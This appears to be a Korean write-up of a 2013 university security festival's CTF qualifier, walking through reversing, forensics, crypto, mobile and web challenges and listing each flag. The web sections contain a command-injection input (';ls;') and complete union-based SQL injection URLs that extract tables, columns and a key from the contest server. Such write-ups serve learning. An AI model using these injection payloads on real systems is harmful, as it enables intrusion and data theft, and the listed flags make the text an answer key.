2013 순천향대학교정보보호페스티벌 예선풀이 이름 : 현성원학교 : 서울대원고등학교아이디 : sweetchip 닉네임 : 맛있는치킨파티점수 : 1320점

Similar documents
Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

비트와바이트 비트와바이트 비트 (Bit) : 2진수값하나 (0 또는 1) 를저장할수있는최소메모리공간 1비트 2비트 3비트... n비트 2^1 = 2개 2^2 = 4개 2^3 = 8개... 2^n 개 1 바이트는 8 비트 2 2

PowerPoint Template

POC "Power of Community" 이민우 (lwmr)

SIGIL 완벽입문

PowerPoint 프레젠테이션

var answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");

PowerPoint Presentation

PowerPoint Template

Microsoft Word - src.doc

Microsoft Word - Crackme 15 from Simples 문제 풀이_by JohnGang.docx

1

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

Windows 8에서 BioStar 1 설치하기

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

로거 자료실

PowerPoint Template

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

Microsoft PowerPoint - chap02-C프로그램시작하기.pptx

untitled

Visual Basic 반복문

<B1E2C3E2B9AEC1A620BDC3B9C4B7B9C0CCBCC7204D B3BBB7C1B9DEB1E2BFCD20BCB3C4A1C7CFB1E E687770>

지도상 유의점 m 학생들이 어려워하는 낱말이 있으므로 자세히 설명해주도록 한다. m 버튼을 무리하게 조작하면 고장이 날 위험이 있으므로 수업 시작 부분에서 주의를 준다. m 활동지를 보고 어려워하는 학생에게는 영상자료를 접속하도록 안내한다. 평가 평가 유형 자기 평가

PowerPoint 프레젠테이션

게시판 스팸 실시간 차단 시스템

금오공대 컴퓨터공학전공 강의자료

ISP and CodeVisionAVR C Compiler.hwp

SMV Vending Machine Implementation and Verification 김성민 정혁준 손영석

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

SBR-100S User Manual

<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C D616E2E637070>

2016 순천향대학교정보보호페스티벌 예선풀이 이름 : 이태양학교 : 한국디지털미디어고등학교아이디 : tylee0208 닉네임 : 5unKn0wn 자기점수 : 1300 등수 : 3

Install stm32cubemx and st-link utility

(Microsoft PowerPoint - \301\24613\260\255 - oFusion \276\300 \261\270\274\272)

메뉴얼41페이지-2

프로그램을 학교 등지에서 조금이라도 배운 사람들을 위한 프로그래밍 노트 입니다. 저 역시 그 사람들 중 하나 입니다. 중고등학교 시절 학교 도서관, 새로 생긴 시립 도서관 등을 다니며 책을 보 고 정리하며 어느정도 독학으르 공부하긴 했지만, 자주 안하다 보면 금방 잊어

Microsoft PowerPoint - ICCAD_Analog_lec01.ppt [호환 모드]

MIC Check 1pt ( pwnable ) 아마도 문제 제목을 저렇게 낸 이유는 공연 전 마이크 테스트를 하는 것처럼 쉬운 것을 하나 풀면서 몸이라도 푸라고 저렇게 정한 게 아닐까 배점은 1 점짜리, pwnable.kr 의 cmd 와 비슷한 문제

Deok9_Exploit Technique


슬라이드 1


SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

A Hierarchical Approach to Interactive Motion Editing for Human-like Figures

금오공대 컴퓨터공학전공 강의자료

BMP 파일 처리

슬라이드 1

4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf("hihi\n"); } warning: conflicting types for functiona

PowerPoint 프레젠테이션

chap 5: Trees

Studuino소프트웨어 설치

The Pocket Guide to TCP/IP Sockets: C Version

歯mp3사용설명서

untitled

<30352D30312D3120BFB5B9AEB0E8BEE0C0C720C0CCC7D82E687770>

Slide 1

목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault

Mango-E-Toi Board Developer Manual

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1 01 [ ] [ ] plus 002

Hack the Packet 보고서 위 dj

2019년도 지엠디 교육

CKKeyPro 적용가이드

학습목표 함수프로시저, 서브프로시저의의미를안다. 매개변수전달방식을학습한다. 함수를이용한프로그래밍한다. 2

Android Master Key Vulnerability

Web Scraper in 30 Minutes 강철

문서의 제목 나눔고딕B, 54pt

arcplan Enterprise 6 Charting Facelifts

제 2 장 기본 사용법

Office 365 사용자 가이드

gnu-lee-oop-kor-lec10-1-chap10

hlogin2

제 2 회 NewHeart 해킹청소년경진대회 Write-up 안양부흥고등학교 2 goodboy( 김남준 ) Misc 100 ( 보너스문제 ) 이상한사진파일하나가첨부된문제이다 처음에는스테가노그래피인줄알고삽질을약간 (?) 하다가 ASCII 인줄알고고생하다가 그대로붙여서계산

Tcl의 문법

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

BEA_WebLogic.hwp

Endpoint Protector - Active Directory Deployment Guide

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx

歯2019

<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F >

JDK이클립스

<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C4C656D70656C2D5A69762E637070>

Observational Determinism for Concurrent Program Security

Ver 1.0 마감하루전 Category Partitioning Testing Tool Project Team T1 Date Team Information 김강욱 김진욱 김동권

Microsoft Word - junior.docx

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

NTD36HD Manual

<4D F736F F F696E74202D203137C0E55FBFACBDC0B9AEC1A6BCD6B7E7BCC72E707074>

server name>/arcgis/rest/services server name>/<web adaptor name>/rest/services ArcGIS 10.1 for Server System requirements - 지

Microsoft Word - poc_script1.doc

SBR-100S User Manual

목차 1. 매뉴얼안내 사용준비 Unified Label Printer Utility 사용방법 PCX File Downloader User Setting Manager File Transfer

PowerPoint 프레젠테이션

Microsoft Word - building the win32 shellcode 01.doc

설계란 무엇인가?

3.20 테러 악성코드바이너리분석 손충호 (StolenByte) WOWHACKER Group 해당문서는 WOWHACKER Group 의문서이므로, 무단도용및수 정및변조는할수없습니다. 페이지 1 / 20

Transcription:

2013 순천향대학교정보보호페스티벌 예선풀이 이름 : 현성원학교 : 서울대원고등학교아이디 : sweetchip 닉네임 : 맛있는치킨파티점수 : 1320점

대회순위표

[Bianry 100] 문제바이너리한개가주어졌다. 이문제는처음힌트가나오기전까지몰랐는데힌트가나오고 나서감잡고풀이를시작했다. 처음윈 8 에선실행했더니크래시가터지고가상 XP 에서돌려보니 그곳에서도역시크래시가터졌다. 그래서결국윈 7 에서하기로했다. 힌트로 Hidden 관련이나오게되었는데숨겨진창이있다는것으로판단해서 mfc100d.dll 모듈에 서 ShowWindows 에 BP 를설정했다. 그리고 f9 를눌러진행하면 Showwindow 에 SW_HIDE 속성 과함께걸려있는것을볼수있다. 그렇다면이속성이아닌다른속성으로바꿔주면된다. SW_SHOW 속성인 0x5 로바꿔주고 f9 를 눌러서진행한다.

진행하면이렇게 secret 버튼이생기는데버튼을클릭하면다음과같이나온다. 이곳에숫자를쓰면 Wrong! 이뜨는데, 대회당시아마이부분이킷값이있는부분이아닐까라 는생각이들고저부분을찾아헤맸다. Wrong! 기준으로주변을찾았는데그중한곳을찾았다. 012C94BA E8 7682FFFF CALL c4334306.012c1735 012C94BF 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14] 012C94C2 8B4D D4 MOV ECX,DWORD PTR SS:[EBP-2C] 012C94C5 3388 A8010000 XOR ECX,DWORD PTR DS:[EAX+1A8] ; input xor 0x174e 012C94CB 894D C8 MOV DWORD PTR SS:[EBP-38],ECX 012C94CE 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38] 012C94D1 C1E0 07 SHL EAX,7 ; input shift 7 012C94D4 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX 012C94D7 817D E0 000D070>CMP DWORD PTR SS:[EBP-20],70D00 ; is 0x70d00 012C94DE 75 23 JNZ SHORT c4334306.012c9503 간략하게나타내보면입력받은값과 0x174e를 XOR연산시키고그값에 7만큼쉬프트연산을 한다. 만약그값이 0x70d00 라면 >>MD5<< 를띄워준다. 실제키는이반대로구하면되는데 거꾸로연산하면 6484가나온다. 이값을 md5 하면된다. Flag : cfa45151ccad6bf11ea146ed563f2119

[Forensic 100] GPX 파일은 GPS 경로를시간순으로담아둔파일이다. 이것을 GPS Route Editor 로열고로딩시 키면아래와같이나오게된다. 집에가기전마지막으로경유한장소는공과대학이고이동수단과처음기록을시작한시각은 GPX 파일안에태그형식으로적혀있다. Flag : 09:17:34_CYCLING_tnscjsgideogkrryrhdrhkeogkr

[Forensic 200] 개인적으로가장어려운문제였다... 게다가힌트도많이주어졌는데가장많이소비한끝에문제 를풀수있었다. 디스크이미지파일이주어졌고 FTK Manager 포렌식툴로열수있다. 파일을열고네이트온받은파일안의그림파일들을싹다긁어온다. 처음힌트중기프티콘의힌트로 gifticon 을생각했고 gif 파일을가져오면된다는추측 [?] 으로가져오게됬는데 gif 파일내용은크레용팝이었다. 그래서스테가노그래피로도시도해보는등많은시도를했지만성과가없었다. 그러자곧새벽의포렌식 200의쏟아지는힌트를조합해서 EOF 라는힌트가나왔다. Gif 구조에대해잘몰라서다른방법을생각해보던중구글이미지검색을사용하기로했다. 운이정말좋게도문제출제떄사용된원본으로추정되는그림을구할수있었는데그그림과 diffing 해본결과한파일에두개의헤더가붙어져있는것을볼수있었다. RIFF 라는새로운헤더가존재하는데 webpvp8 과검색해보니이미지파일이라고한다. 구글에서만든것이라고하는것같기도한다. 파일을떼어냈더니약 7KB이고 webp로확장자를바꿔힌트에나온크롬으로실행했더니깨진파일으로나와운영진분께잘못된것이아니냐고물어봤었는데, 아니라고하셔서복구를하기로했다. 복구는같은포멧의샘플파일을구해서비교를하면서복구했다.

위두부분이정상적으로고쳐진헤더이다. 빨간색부분은대문자로바꾼것이고, 파란색부분은 크기를처음 gif 파일의크기를그대로붙여넣은것이다. 복구를성공하고원본이미지가출력되 었다. Flag : Cr@yon_PoP_pOp_PoP

[Misc 100] 거대한 ppt 파일이주어졌다. 실행파일을찾으라는문제인데 ppt를열면프로그램이죽을정도로아름답게그림들이채워져있다. 잠시고민을해보고파일들을뒤져본끝에숨겨진파일이름은 application.exe 라는것을알수있엇고이것으로인증하니답이아니라고한다. 그래서실제로 exe 파일이존재할것같아서 ppt/embedding 파일을살펴봤지만, 모두크기도똑같아서바로구문해낼수없었는데, 간단한파일해시비교스크립트를작성해서풀기로했다. import glob import hashlib File_List = glob.glob('*.bin') def md5checksum(filepath): with open(filepath, 'rb') as fh: m = hashlib.md5() while True: data = fh.read(8192) if not data: break m.update(data) return m.hexdigest() if name == ' main ': a = md5checksum(file_list[0]) b = "" for i in File_List: print i b = md5checksum(i) if a!= b: print "WTF? "+i raw_input() oleobject2257.bin oleobject2258.bin oleobject2259.bin oleobject226.bin WTF? oleobject226.bin

실제로실행시켜보면 226.bin 파일이이전파일들의해시값과다른것을볼수있다. Hex editor 로실행파일 mz 매직넘버를찾은뒤파일을분리하고저장시킨다음실행한다. C:\Users\ 성원 >C:\Users\ 성원 \Downloads\ae1dd739df1f62afe5ae78cb1ff7cdeda00b4d5\pp t\embeddings\oleobject226.exe WoW~Sense!! Flag : WoW~Sense!!

[Misc 200] 바이너리하나가주어지고키를찾으라는문제이다. 처음엔파일확장자가뭔지몰라 hex editor 로살펴봤는데알고보니 TTF 트루타입글꼴이었다. 그래서이글꼴을설치하고문제를복사해서 붙여넣는데이상하게도어느글자가알파벳으로바뀌어있었다. 그래서글자표를살펴봤다. 첫번째출에 y 처럼바뀌어있는걸볼수있다. 가나다순으로바뀐글자들을하나하나붙이고글꼴을 yisf 로설정하면위와같이나오는데다시 맑은고딕같은일반으로바꿔보면한글로나온다

이문자를보면서상당히많은고민을하고재조합한끝에조선의 ~~ 힌트와함께세종대왕이 생각났고그것을생각해보며다시조합해보니태정태세... 조선왕조계보와비슷하게나왔다. 그래서태정태세문단세예성연중인명선광인효현숙경영정순헌철고순을입력하면위와같이나오게 된다. 당시인증서버가이상해서인지오류인지는모르겠지만인증이되다안되다했다. 그래서 여러경우의수를입력했엇는데플래그는아마위에서 X0 가빠진것으로기억된다... 오랜만에역사공부를다시했다. Flag : WtW_UR_G3n10us_0f_H1st0ry

[crypto 100] 웹사이트링크가하나주어졌다. 그중관련기사탭의외부기사중하나를살펴보면위에이상한문자열이있다. 그리고문제에서다름글자를볼수있다. Down fall = 몰락 Fall down = 약하다 Fair Play = 순천향대정보보호학과축구동아리 이것들을보아 playfair 를생각해볼수있고, 구글링을통해 playfair 이라는암호가있다는것을 알아냈다. 그래서 fairplay 를키값으로하고위문자열을복호화시키면키가출력된다. ( 키에서마 지막 x 를제거해야인중이된다 ) Flag : snsisawasteoflife

[crypto 200] 이문제는힌트가뜨고난다음에풀수있엇다. 일단 avi 파일이하나주어지고내용은요즘유행하는진격의거인애니메이션의오프닝동영상 이었다. 그리고간간히이상한글자들이나오는데의미를몰라못풀고있었다가 ip 라는힌트를 보고 이걸왜몰랏었지.. 라는충격을받았다. 영상에나온글자들 집중! 59 27 190 86 :7000 quiz 위문자를힌트에따라조합하면 59.27.190.86:7000/quiz 가되는데들어가면암호학 A 형이나오 면서진짜암호학과관련된단답형 10 문제들을풀수있다. [ 기회는단한번!] Flag : 답 10 개모두기억이안나네요... ㅠㅠ

[mobile 100] Apk 파일이하나주어졌다. 100 점이라어렵지않은것으로예상하고바로리소스로들어가서파 일들을뒤졋는데다음두파일이나왔다. Apk 는그림맞추기를하는게아닐까싶어그림판으로손수그림을맞춰봤다. 미술에소질이없어 키가부서진것처럼되긴했지만알아볼수는있을정도로복구했다!. Flag : mellow5

[Web 100] 웹주소 1 개가주어졌다. Post 형태로넘어가는계산기가있었다. 1 도넣고 2 도넣었지만실행이 되지않았는데여러시도를해보는도중특정문자를필터링하는걸발견했다. Post 로값을넘기면일정파라메터가각각 ;, $ 등을필터링시킨다. 이것을보고 command execution 취약점을공격해야한다는것을예상하고파라미터를조작시켰다. Plus 라디오버튼을클릭하고 Num1 파라미터에 ;ls; 를입력하고 num2 에는아무글자나입력한 다. 그리고 calc 를누르면 Result 에 Base64 로인코딩된문자열이출력된다 Calc Result : RjE0OQphCmhlbGxvCmluZGV4LnBocAppbmRleF8xMDlzLmxvZwo= F149 a hello index.php index_109s.log F149 파일을열면키가출력된다. Flag : Let's_go_GungJungWhaRo

[Web 200] 웹주소 1 개가주어졌다. 주소로접속해보면여러가지게시판이있는데간단하게파라미터를조 작시켜보면 sql injection 취약점이존재한다는것을알수있다. 게시판 num 파라미터에 union SQL Injection 코드를삽입한다 테이블추출 http://yisf.sch.ac.kr:7600/q2/view.php?no=0%20union%20select%201,2,(select%20distinct%20gro up_concat(table_name)%20from%20information_schema.tables%20where%201%20),4,5# 칼럼명추출 http://yisf.sch.ac.kr:7600/q2/view.php?no=0 union select 1,2,(select distinct group_concat(column_name) from information_schema.columns where TABLE_NAME="F149" ),4,5# 플래그추출 http://yisf.sch.ac.kr:7600/q2/view.php?no=0 union select 1,2,(select k3y from F149 where 1 ),4,5# Flag : DHEJFQKDL_SQL_1NJ3CT10N